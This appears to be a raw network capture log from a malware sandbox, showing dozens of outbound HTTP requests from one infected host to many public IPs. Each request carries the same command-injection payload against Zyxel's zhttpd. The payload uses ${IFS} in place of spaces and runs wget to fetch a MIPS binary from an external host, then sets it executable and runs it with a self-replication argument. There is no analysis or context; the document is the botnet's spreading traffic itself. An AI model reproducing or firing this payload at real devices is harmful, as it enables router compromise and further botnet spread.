                                                Jan 12, 2024 18:16:40.860061884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8909192.168.2.234353625.236.94.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860099077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8910192.168.2.2358758106.50.246.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860146046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8911192.168.2.234872035.172.119.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860182047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8912192.168.2.2358042162.103.244.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860213041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8913192.168.2.2349262211.109.238.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860248089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8914192.168.2.2342028134.95.193.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860286951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8915192.168.2.2348976111.245.238.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860307932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8916192.168.2.2348328210.83.225.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860363960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8917192.168.2.234566292.217.239.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860405922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8918192.168.2.233569647.18.98.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860452890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8919192.168.2.235315414.117.24.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860495090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8920192.168.2.2353828167.45.94.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860538960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8921192.168.2.2337498123.106.107.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860583067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8922192.168.2.2356390143.40.82.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860632896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8923192.168.2.2354462135.234.174.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860677004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8924192.168.2.2338708199.46.136.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860712051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8925192.168.2.2335402155.110.142.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860765934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8926192.168.2.234209625.151.244.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860795975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8927192.168.2.2348634137.240.11.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860837936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8928192.168.2.2360274106.207.164.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860862970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8929192.168.2.235132846.146.94.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860892057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8930192.168.2.2357358100.162.62.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860938072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8931192.168.2.235122447.184.32.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860966921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8932192.168.2.235821086.180.220.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.860991001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8933192.168.2.2345690201.75.95.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861054897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8934192.168.2.2352472116.220.194.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861093044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8935192.168.2.2354690112.109.47.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861141920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8936192.168.2.2345744177.171.71.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861166954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8937192.168.2.235409251.167.39.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861206055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8938192.168.2.2336538178.73.143.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861233950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8939192.168.2.235384690.157.26.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861251116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8940192.168.2.2353716165.140.210.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861294031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8941192.168.2.23558568.131.59.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861332893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8942192.168.2.234846217.175.169.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861366987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8943192.168.2.2360298106.227.2.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861397982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8944192.168.2.233671040.62.170.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861443996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8945192.168.2.234614438.37.97.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861476898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8946192.168.2.234554463.68.160.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861540079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8947192.168.2.2341512136.233.100.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861546993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8948192.168.2.235244041.118.186.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861587048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8949192.168.2.235777636.102.70.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861632109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8950192.168.2.2353864116.41.203.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861664057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8951192.168.2.2352538135.168.167.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861690998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8952192.168.2.2344566218.123.61.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861743927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8953192.168.2.2357884161.18.80.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861798048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8954192.168.2.2335600209.6.171.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861814976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8955192.168.2.234676278.199.52.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861824989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8956192.168.2.234315295.71.215.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861876965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8957192.168.2.234622617.54.105.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861912966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8958192.168.2.2360388129.244.32.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.861968994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8959192.168.2.235556832.83.54.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862011909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8960192.168.2.2333790152.151.208.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862030983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8961192.168.2.2335484151.143.113.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862055063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8962192.168.2.2351852137.114.107.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862091064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8963192.168.2.2335054125.19.100.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862113953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8964192.168.2.2356520143.38.74.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862152100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8965192.168.2.2344730145.168.24.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862188101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8966192.168.2.234641064.174.46.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862245083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8967192.168.2.2346064101.233.229.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862283945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8968192.168.2.233847435.110.0.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862291098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8969192.168.2.233913472.171.100.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862337112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8970192.168.2.2350852144.187.85.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862380028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8971192.168.2.2360708101.84.103.27443
                                                TimestampBytes transferredDirectionData
